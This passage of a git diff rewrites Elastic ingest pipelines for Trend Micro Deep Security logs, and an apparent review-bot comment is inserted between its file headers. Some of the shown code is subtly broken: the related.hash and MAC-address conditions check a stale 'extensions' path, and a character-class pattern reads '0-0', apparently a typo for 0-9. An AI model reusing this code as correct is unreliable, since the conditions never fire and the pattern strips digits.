{{#each tags as |tag|}}
- {{tag}}
{{/each}}
@@ -15,9 +21,12 @@ processors:
- {from: "message", to: "event.original"}
- decode_cef:
field: event.original
-{{#if decode_trendmicro_timezone}}
- timezone: {{ decode_trendmicro_timezone }}
+{{#if tz_offset}}
+fields_under_root: true
+fields:
+ _conf:
+ tz_offset: {{tz_offset}}
{{/if}}
{{#if processors}}
{{processors}}
-{{/if}}
\ No newline at end of file
+{{/if}}
diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/application-control-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/application-control-event.yml
index 74c536dd8ce..f6159387ed4 100644
--- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/application-control-event.yml
+++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/application-control-event.yml
@@ -1,100 +1,42 @@
---
-description: Pipeline for processing Application Control event logs
+description: Pipeline for processing Application Control event logs.
processors:
- set:
- field: trendmicro.event.category
- value: "app-control"
- - set:
+ field: trendmicro.deep_security.event_category
+ tag: set_deep_security_event_category
+ value: application-control-event
+ - append:
field: event.category
- value: [intrusion_detection,package]
+ tag: set_event_category
+ value: intrusion_detection
+ allow_duplicates: false
- append:
field: event.type
+ tag: set_event_type
value: info
allow_duplicates: false
- append:
field: event.type
+ tag: set_event_type
value: denied
allow_duplicates: false
- if: ctx.trendmicro?.event?.signature_id != null && !['6002100','6002200'].contains(ctx.trendmicro.event.signature_id)
-
- - script:
- lang: painless
- params:
- extensions:
- # Rename field
- - name: deviceCustomNumber1
- to: host.id
- - name: deviceCustomString1
- to: trendmicro.event.action_reason
- - name: deviceCustomString3
- to: file.hash.md5
- - name: deviceCustomString2
- to: file.hash.sha1
- - name: fileHash
- to: file.hash.sha256
- - name: deviceAddress
- to: host.ip
- - name: deviceHostName
- to: host.hostname
- - name: TrendMicroDsTags
- to: trendmicro.event.tags
- - name: TrendMicroDsTenantId
- to: trendmicro.event.tenant_id
- - name: TrendMicroDsTenant
- to: trendmicro.event.tenant_name
- - name: aggregationType
- to: trendmicro.event.aggregation_type
- convert:
- "0": The event is not aggregated
- "1": The event is aggregated based on file name,path,and event type
- "2": The event is aggregated based on event type
- - name: repeatCount
- to: trendmicro.event.count
-
- source: |
- def actions = new ArrayList();
- def exts = ctx.cef?.extensions;
- if (exts == null) return;
- for (entry in params.extensions) {
- def value = exts[entry.name];
- if (value == null ||
- (entry.convert != null &&
- (value=entry.convert[value.toLowerCase()]) == null))
- continue;
- if (entry.to != null) {
- actions.add([
- "value": value,
- "to": entry.to
- ]);
- continue;
- }
- def label = exts[entry.name + "Label"];
- if (label == null) continue;
- def dest = entry.labels[label.toLowerCase()];
- if (dest == null) continue;
- actions.add([
- "value": value,
- "to": dest
- ]);
- }
- ctx["_tmp_copy"] = actions;
- - foreach:
- field: _tmp_copy
- processor:
- set:
- field: "{{_ingest._value.to}}"
- value: "{{_ingest._value.value}}"
- ignore_empty_value: true
-
- - remove:
- field:
- - _tmp_copy
- ignore_missing: true
-
+ if: ctx.trendmicro?.deep_security?.signature_id != null && ctx.trendmicro.deep_security.signature_id != 6002100 && ctx.trendmicro.deep_security.signature_id != 6002200
+ - append:
+ field: related.hash
+ tag: append_cs2_value_to_related_hash
+ value: '{{{trendmicro.deep_security.extensions.device.custom_string2.value}}}'
+ allow_duplicates: false
+ if: ctx.trendmicro?.deep_security?.extensions?.device?.custom_string2?.value != null
+ - append:
+ field: related.hash
+ tag: append_cs3_value_to_related_hash
+ value: '{{{trendmicro.deep_security.extensions.device.custom_string3.value}}}'
+ allow_duplicates: false
+ if: ctx.trendmicro?.deep_security?.extensions?.device?.custom_string3?.value != null
on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- set:
field: event.kind
value: pipeline_error
- - append:
- field: error.message
- value: '{{{ _ingest.on_failure_message }}}'
diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/default.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/default.yml
index 15f81b30da6..9c4fd8ba613 100644
--- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/default.yml
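Review bot: The two `related.hash` appends at the end of the hunk key on `trendmicro.deep_security.extensions.device.custom_string2.value` / `custom_string3.value`, but the default pipeline in this same change renames `deviceCustomString2` and `deviceCustomString3` to `trendmicro.deep_security.device.custom_string2.value` and `...custom_string3.value` with no `extensions` segment, so both `if` conditions are always false and nothing is ever appended. Dropping `extensions` from the four `value`/`if` lines fixes it, e.g. `if: ctx.trendmicro?.deep_security?.device?.custom_string2?.value != null` and `value: '{{{trendmicro.deep_security.device.custom_string2.value}}}'`. The same stale `deep_security?.extensions` segment is used in the default pipeline's `ds_file.md5`/`sha1`/`sha256` `related.hash` conditions (dead for the same reason) and in its MAC-address `uppercase` guards (harmless there only because they compare against `''`), so one sweep for that path is worthwhile. The removed script also mapped cs3 to `file.hash.md5` and cs2 to `file.hash.sha1`; if that ECS mapping is still wanted for application-control events, note that the new hunk only pushes the raw values into `related.hash`, which is worth confirming against the expected test output.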
+++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/default.yml 
@@ -1,81 +1,860 @@ --- -description: Pipeline for trendmicro deep security logs. - +description: Pipeline for processing Deep Security logs. processors: - set: field: ecs.version - value: "8.11.0" + tag: set_ecs_version + value: 8.11.0 - set: - field: trendmicro.event.signature_id - value: "{{{event.code}}}" + field: event.kind + tag: set_event_kind + value: event + - rename: + field: cef.device.event_class_id + tag: rename_device_event_class_id + target_field: trendmicro.deep_security.event_class_id + ignore_missing: true + - set: + field: event.code + tag: set_event_code_from_deep_security_device_event_class_id + copy_from: trendmicro.deep_security.event_class_id + ignore_empty_value: true + - convert: + field: event.code + tag: convert_event_code + target_field: trendmicro.deep_security.signature_id + type: long + ignore_missing: true + if: ctx.event?.code != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.action + tag: set_default_event_action_from_event_name + copy_from: cef.name + ignore_empty_value: true + - gsub: + field: event.action + pattern: '[^a-zA-Z0-0]' + replacement: ' ' + if: ctx.event?.action != null + - rename: + field: cef.device.product + tag: rename_cef_device_product + target_field: trendmicro.deep_security.device.product + ignore_missing: true + - set: + field: observer.product + tag: set_observer_product_from_deep_security_device_product + copy_from: trendmicro.deep_security.device.product + ignore_empty_value: true + - rename: + field: cef.device.vendor + tag: rename_cef_device_vendor + target_field: trendmicro.deep_security.device.vendor + ignore_missing: true + - set: + field: observer.vendor + tag: set_observer_vendor_from_deep_security_device_vendor + copy_from: trendmicro.deep_security.device.vendor + 
ignore_empty_value: true + - rename: + field: cef.device.version + tag: rename_cef_device_version + target_field: trendmicro.deep_security.device.version + ignore_missing: true + - set: + field: observer.version + tag: set_observer_version_from_deep_security_device_version + copy_from: trendmicro.deep_security.device.version + ignore_empty_value: true + - convert: + field: cef.extensions.baseEventCount + tag: convert_cef_extensions_baseEventCount_to_long + target_field: trendmicro.deep_security.base_event_count + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: cef.extensions.bytesIn + tag: convert_cef_extensions_bytesIn_to_long + target_field: trendmicro.deep_security.bytes_in + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.bytes + tag: set_source_bytes_from_deep_security_bytes_in + copy_from: trendmicro.deep_security.bytes_in + ignore_empty_value: true + - convert: + field: cef.extensions.destinationAddress + tag: convert_cef_extensions_destinationAddress_to_ip + target_field: trendmicro.deep_security.destination.address + type: ip + ignore_missing: true + if: ctx.cef?.extensions?.destinationAddress != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: 
set_destination_ip_from_deep_security_destination_address + copy_from: trendmicro.deep_security.destination.address + ignore_empty_value: true + - append: + field: related.ip + tag: append_destination_ip_to_related_ip + value: '{{{destination.ip}}}' + allow_duplicates: false + if: ctx.destination?.ip != null + - geoip: + field: destination.ip + tag: geoip_destination_ip + target_field: destination.geo + ignore_missing: true + - gsub: + field: cef.extensions.destinationMacAddress + tag: gsub_destinationMacAddress + target_field: trendmicro.deep_security.destination.mac_address + pattern: '[-:.]' + replacement: '-' + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - uppercase: + field: trendmicro.deep_security.destination.mac_address + tag: uppercase_destination_mac_address + ignore_missing: true + if: ctx.trendmicro?.deep_security?.extensions?.destination?.mac_address != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.mac + tag: set_destination_mac_from_deep_security_destination_mac_address + copy_from: trendmicro.deep_security.destination.mac_address + ignore_empty_value: true + - convert: + field: cef.extensions.destinationPort + tag: convert_cef_extensions_destinationPort_to_long + target_field: trendmicro.deep_security.destination.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: 
{{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_deep_security_destination_port + copy_from: trendmicro.deep_security.destination.port + ignore_empty_value: true + - rename: + field: cef.extensions.deviceAction + tag: rename_cef_extensions_deviceAction + target_field: trendmicro.deep_security.action + ignore_missing: true + - set: + field: event.action + tag: set_event_action_from_deep_security_device_action + copy_from: trendmicro.deep_security.action + ignore_empty_value: true + - lowercase: + field: event.action + tag: lowercase_event_action + ignore_missing: true + - split: + field: event.action + tag: split_event_action + separator: \s+ + ignore_missing: true + if: ctx.event?.action != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - join: + field: event.action + tag: join_event_action + separator: '-' + if: ctx.event?.action != null && ctx.event.action != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomNumber1Label + tag: rename_cef_extensions_deviceCustomNumber1Label + target_field: trendmicro.deep_security.device.custom_number1.label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomNumber1 + tag: convert_cef_extensions_deviceCustomNumber1_to_string + target_field: trendmicro.deep_security.device.custom_number1.value + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in 
pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: host.id + tag: set_host_id_from_deep_security_device_custom_number1_value + copy_from: trendmicro.deep_security.device.custom_number1.value + ignore_empty_value: true + - append: + field: related.hosts + tag: append_host_id_to_related_hosts + value: '{{{host.id}}}' + allow_duplicates: false + if: ctx.host?.id != null + - rename: + field: cef.extensions.deviceCustomNumber2Label + tag: rename_cef_extensions_deviceCustomNumber2Label + target_field: trendmicro.deep_security.device.custom_number2.label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomNumber2 + tag: convert_cef_extensions_deviceCustomNumber2_to_long + target_field: trendmicro.deep_security.device.custom_number2.value + ignore_missing: true + type: long + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomNumber3Label + tag: rename_cef_extensions_deviceCustomNumber3Label + target_field: trendmicro.deep_security.device.custom_number3.label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomNumber3 + tag: convert_cef_extensions_deviceCustomNumber3_to_long + target_field: trendmicro.deep_security.device.custom_number3.value + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomString1Label + tag: rename_cef_extensions_deviceCustomString1Label + target_field: trendmicro.deep_security.device.custom_string1.label + 
ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString1 + tag: rename_cef_extensions_deviceCustomString1 + target_field: trendmicro.deep_security.device.custom_string1.value + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString2Label + tag: rename_cef_extensions_deviceCustomString2Label + target_field: trendmicro.deep_security.device.custom_string2.label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString2 + tag: rename_cef_extensions_deviceCustomString2 + target_field: trendmicro.deep_security.device.custom_string2.value + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString3Label + tag: rename_cef_extensions_deviceCustomString3Label + target_field: trendmicro.deep_security.device.custom_string3.label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString3 + tag: rename_cef_extensions_deviceCustomString3 + target_field: trendmicro.deep_security.device.custom_string3.value + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString4Label + tag: rename_extensions_deviceCustomString4Label + target_field: trendmicro.deep_security.device.custom_string4.label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString4 + tag: rename_extensions_deviceCustomString4 + target_field: trendmicro.deep_security.device.custom_string4.value + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString5Label + tag: rename_cef_extensions_deviceCustomString5Label + target_field: trendmicro.deep_security.device.custom_string5.label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomString5 + tag: convert_cef_extensions_deviceCustomString5_to_string + target_field: trendmicro.deep_security.device.custom_string5.value + ignore_missing: true + type: string + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag 
{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomString6Label + tag: rename_cef_extensions_deviceCustomString6Label + target_field: trendmicro.deep_security.device.custom_string6.label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString6 + tag: rename_cef_extensions_deviceCustomString6 + target_field: trendmicro.deep_security.device.custom_string6.value + ignore_missing: true + - rename: + field: cef.extensions.cs7Label + tag: rename_cef_extensions_cs7Label + target_field: trendmicro.deep_security.device.custom_string7.label + ignore_missing: true + - rename: + field: cef.extensions.cs7 + tag: rename_cef_extensions_cs7 + target_field: trendmicro.deep_security.device.custom_string7.value + ignore_missing: true + - rename: + field: cef.extensions.deviceHostName + tag: rename_cef_extensions_deviceHostName + target_field: trendmicro.deep_security.deviceHostName + ignore_missing: true + - set: + field: observer.hostname + tag: set_observer_hostname_from_deep_security_deviceHostName + copy_from: trendmicro.deep_security.deviceHostName + ignore_empty_value: true + - rename: + field: cef.extensions.filePath + tag: rename_extensions_filePath + target_field: trendmicro.deep_security.file_path + ignore_missing: true + - set: + field: file.path + tag: set_file_path_from_deep_security_file_path + copy_from: trendmicro.deep_security.file_path + ignore_empty_value: true + - rename: + field: cef.extensions.message + tag: rename_extensions_message + target_field: trendmicro.deep_security.message + ignore_missing: true + - convert: + field: cef.extensions.sourceAddress + tag: convert_cef_extensions_sourceAddress_to_ip + target_field: trendmicro.deep_security.source.address + type: ip + ignore_missing: true + if: ctx.cef?.extensions?.sourceAddress != '' + on_failure: + - append: + field: error.message + value: 'Processor 
{{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_deep_security_source_address + copy_from: trendmicro.deep_security.source.address + ignore_empty_value: true + - append: + field: related.ip + tag: append_source_ip_to_related_ip + value: '{{{source.ip}}}' + allow_duplicates: false + if: ctx.source?.ip != null + - geoip: + field: source.ip + tag: geoip_source_ip + target_field: source.geo + ignore_missing: true + - gsub: + field: cef.extensions.sourceMacAddress + tag: gsub_sourceMacAddress + target_field: trendmicro.deep_security.source.mac_address + pattern: '[-:.]' + replacement: '-' + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - uppercase: + field: trendmicro.deep_security.source.mac_address + tag: uppercase_source_mac_address + ignore_missing: true + if: ctx.trendmicro?.deep_security?.extensions?.source?.mac_address != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.mac + tag: set_source_mac_from_deep_security_source_mac_address + copy_from: trendmicro.deep_security.source.mac_address + ignore_empty_value: true + - convert: + field: cef.extensions.sourcePort + tag: convert_cef_extensions_sourcePort_to_long + target_field: trendmicro.deep_security.source.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with 
tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_deep_security_source_port + copy_from: trendmicro.deep_security.source.port + ignore_empty_value: true + - rename: + field: cef.extensions.sourceProcessName + tag: rename_extensions_sourceProcessName + target_field: trendmicro.deep_security.source.process_name + ignore_missing: true + - rename: + field: cef.extensions.sourceUserName + tag: rename_extensions_sourceUserName + target_field: trendmicro.deep_security.source.user_name + ignore_missing: true + - set: + field: source.user.name + tag: set_source_user_name_from_deep_security_source_user_name + copy_from: trendmicro.deep_security.source.user_name + ignore_empty_value: true + - append: + field: related.user + tag: append_source_user_name_to_related_user + value: '{{{source.user.name}}}' + allow_duplicates: false + if: ctx.source?.user?.name != null + - rename: + field: cef.extensions.transportProtocol + tag: rename_cef_extensions_transportProtocol + target_field: trendmicro.deep_security.transport_protocol + ignore_missing: true + - set: + field: network.transport + tag: set_network_transport_from_deep_security_transport_protocol + copy_from: trendmicro.deep_security.transport_protocol + ignore_empty_value: true + - lowercase: + field: network.transport + tag: lowercase_network_transport + ignore_missing: true - rename: - field: message - target_field: trendmicro.event.message + field: cef.extensions.TrendMicroDsFrameType + tag: rename_cef_extensions_TrendMicroDsFrameType + target_field: trendmicro.deep_security.trendmicro.ds_frame_type + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsPacketData + tag: rename_cef_extensions_TrendMicroDsPacketData + target_field: trendmicro.deep_security.trendmicro.ds_packet_data + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsTenant + 
tag: rename_cef_extensions_TrendMicroDsTenant + target_field: trendmicro.deep_security.trendmicro.ds_tenant + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsTenantId + tag: rename_cef_extensions_TrendMicroDsTenantId + target_field: trendmicro.deep_security.trendmicro.ds_tenant_id + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsTags + tag: rename_cef_extensions_TrendMicroDsTags + target_field: trendmicro.deep_security.trendmicro.ds_tags + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsReasonId + tag: rename_cef_extensions_TrendMicroDsReasonId + target_field: trendmicro.deep_security.trendmicro.ds_reason_id ignore_missing: true - rename: field: cef.name - target_field: trendmicro.event.name + tag: rename_cef_name + target_field: trendmicro.deep_security.name + ignore_missing: true + - convert: + field: cef.severity + tag: convert_cef_severity_to_long + target_field: trendmicro.deep_security.severity + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.severity + tag: set_event_severity_from_deep_security_severity + copy_from: trendmicro.deep_security.severity + ignore_empty_value: true + - rename: + field: cef.version + tag: rename_cef_version + target_field: trendmicro.deep_security.version + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsBehaviorRuleID + tag: rename_extensions_TrendMicroDsBehaviorRuleID + target_field: trendmicro.deep_security.trendmicro.ds_behavior.rule_id + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsBehaviorType + tag: rename_extensions_TrendMicroDsBehaviorType + target_field: trendmicro.deep_security.trendmicro.ds_behavior.type + ignore_missing: true + - rename: + field: 
cef.extensions.TrendMicroDsCommandLine + tag: rename_extensions_TrendMicroDsCommandLine + target_field: trendmicro.deep_security.trendmicro.ds_command_line + ignore_missing: true + - set: + field: process.command_line + tag: set_process_command_line + copy_from: trendmicro.deep_security.trendmicro.ds_command_line + ignore_empty_value: true + - rename: + field: cef.extensions.TrendMicroDsCve + tag: rename_extensions_TrendMicroDsCve + target_field: trendmicro.deep_security.trendmicro.ds_cve + ignore_missing: true + - set: + field: vulnerability.id + tag: set_vulnerability_id + copy_from: trendmicro.deep_security.trendmicro.ds_cve + ignore_empty_value: true + - rename: + field: cef.extensions.filename + tag: rename_extensions_filename + target_field: trendmicro.deep_security.filename + ignore_missing: true + - rename: + field: cef.extensions.result + tag: rename_extensions_result + target_field: trendmicro.deep_security.result + ignore_missing: true + - rename: + field: cef.extensions.sourceHostName + tag: rename_extensions_sourceHostName + target_field: trendmicro.deep_security.source.host_name + ignore_missing: true + - rename: + field: cef.extensions.target + tag: rename_extensions_target + target_field: trendmicro.deep_security.target.value + ignore_missing: true + - rename: + field: cef.extensions.targetID + tag: rename_extensions_targetID + target_field: trendmicro.deep_security.target.id + ignore_missing: true + - convert: + field: cef.extensions.TrendMicroDsDetectionConfidence + tag: convert_extensions_TrendMicroDsDetectionConfidence_to_long + target_field: trendmicro.deep_security.trendmicro.ds_detection_confidence + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.TrendMicroDsFileMD5 
+ tag: rename_extensions_TrendMicroDsFileMD5 + target_field: trendmicro.deep_security.trendmicro.ds_file.md5 + ignore_missing: true + - set: + field: file.hash.md5 + tag: set_file_hash_md5 + copy_from: trendmicro.deep_security.trendmicro.ds_file.md5 + ignore_empty_value: true + - append: + field: related.hash + tag: append_ds_file_md5_to_related_hash + value: '{{{trendmicro.deep_security.trendmicro.ds_file.md5}}}' + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.extensions?.trendmicro?.ds_file?.md5 != null + - rename: + field: cef.extensions.TrendMicroDsFileSHA1 + tag: rename_extensions_TrendMicroDsFileSHA1 + target_field: trendmicro.deep_security.trendmicro.ds_file.sha1 + ignore_missing: true + - append: + field: related.hash + tag: append_ds_file_sha1_to_related_hash + value: '{{{trendmicro.deep_security.trendmicro.ds_file.sha1}}}' + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.extensions?.trendmicro?.ds_file?.sha1 != null + - set: + field: file.hash.sha1 + tag: set_file_hash_sha1 + copy_from: trendmicro.deep_security.trendmicro.ds_file.sha1 + ignore_empty_value: true + - rename: + field: cef.extensions.TrendMicroDsFileSHA256 + tag: rename_extensions_TrendMicroDsFileSHA256 + target_field: trendmicro.deep_security.trendmicro.ds_file.sha256 + ignore_missing: true + - append: + field: related.hash + tag: append_ds_file_sha256_to_related_hash + value: '{{{trendmicro.deep_security.trendmicro.ds_file.sha256}}}' + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.extensions?.trendmicro?.ds_file?.sha256 != null + - set: + field: file.hash.sha256 + tag: set_file_hash_sha256 + copy_from: trendmicro.deep_security.trendmicro.ds_file.sha256 + ignore_empty_value: true + - convert: + field: cef.extensions.TrendMicroDsMalwareTargetCount + tag: convert_extensions_TrendMicroDsMalwareTargetCount_to_long + target_field: trendmicro.deep_security.trendmicro.ds_malware_target.count + type: long + ignore_missing: true + on_failure: + - append: + 
field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.TrendMicroDsMalwareTargetType + tag: rename_extensions_TrendMicroDsMalwareTargetType + target_field: trendmicro.deep_security.trendmicro.ds_malware_target.type + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsMalwareTarget + tag: rename_extensions_TrendMicroDsMalwareTarget + target_field: trendmicro.deep_security.trendmicro.ds_malware_target.value + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsMitre + tag: rename_extensions_TrendMicroDsMitre + target_field: trendmicro.deep_security.trendmicro.ds_mitre + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsProcess + tag: rename_extensions_TrendMicroDsProcess + target_field: trendmicro.deep_security.trendmicro.ds_process + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsRelevantDetectionNames + tag: rename_extensions_TrendMicroDsRelevantDetectionNames + target_field: trendmicro.deep_security.trendmicro.ds_relevant_detection_names + ignore_missing: true + - community_id: + tag: community_id + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.aggregationType + tag: rename_extensions_aggregationType + target_field: trendmicro.deep_security.aggregation_type + ignore_missing: true + - rename: + field: cef.extensions.computerName + tag: rename_extensions_computerName + target_field: trendmicro.deep_security.computer_name + ignore_missing: true + - set: + field: host.hostname + tag: set_host_hostname + copy_from: 
trendmicro.deep_security.computer_name + ignore_empty_value: true + - rename: + field: cef.extensions.destinationUserName + tag: rename_extensions_destinationUserName + target_field: trendmicro.deep_security.destination.user_name + ignore_missing: true + - set: + field: destination.user.name + tag: set_destination_user_name_from_deep_security_destination_user_name + copy_from: trendmicro.deep_security.destination.user_name + ignore_empty_value: true + - append: + field: related.user + tag: append_destination_user_name_to_related_user + value: '{{{destination.user.name}}}' + allow_duplicates: false + if: ctx.destination?.user?.name != null + - rename: + field: cef.extensions.deviceType + tag: rename_extensions_deviceType + target_field: trendmicro.deep_security.type + ignore_missing: true + - rename: + field: cef.extensions.domainName + tag: rename_extensions_domainName + target_field: trendmicro.deep_security.domain_name + ignore_missing: true + - rename: + field: cef.extensions.fileHash + tag: rename_extensions_fileHash + target_field: trendmicro.deep_security.file.hash + ignore_missing: true + - set: + field: file.hash.sha256 + tag: set_file_hash_sha256_from_deep_security_file_hash + copy_from: trendmicro.deep_security.file.hash + ignore_empty_value: true + - append: + field: related.hash + tag: append_file_hash_sha256_to_related_hash + value: '{{{file.hash.sha256}}}' + allow_duplicates: false + if: ctx.file?.hash?.sha256 != null + - convert: + field: cef.extensions.fileSize + tag: convert_extensions_fileSize_to_long + target_field: trendmicro.deep_security.file.size + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: file.size + tag: set_file_size_from_deep_security_file_size + copy_from: 
trendmicro.deep_security.file.size + ignore_empty_value: true + - rename: + field: cef.extensions.model + tag: rename_extensions_model + target_field: trendmicro.deep_security.model ignore_missing: true + - set: + field: device.model.identifier + tag: set_device_model_identifier + copy_from: trendmicro.deep_security.model + ignore_empty_value: true + - rename: + field: cef.extensions.permission + tag: rename_extensions_permission + target_field: trendmicro.deep_security.permission + ignore_missing: true + - rename: + field: cef.extensions.processName + tag: rename_extensions_processName + target_field: trendmicro.deep_security.process.name + ignore_missing: true + - set: + field: process.name + tag: set_process_name_from_deep_security_process_name + copy_from: trendmicro.deep_security.process.name + ignore_empty_value: true + - rename: + field: cef.extensions.repeatCount + tag: rename_extensions_repeatCount + target_field: trendmicro.deep_security.repeat_count + ignore_missing: true + - rename: + field: cef.extensions.requestUrl + tag: rename_extensions_requestUrl + target_field: trendmicro.deep_security.request_url + ignore_missing: true + - set: + field: url.original + tag: set_url_original + copy_from: trendmicro.deep_security.request_url + 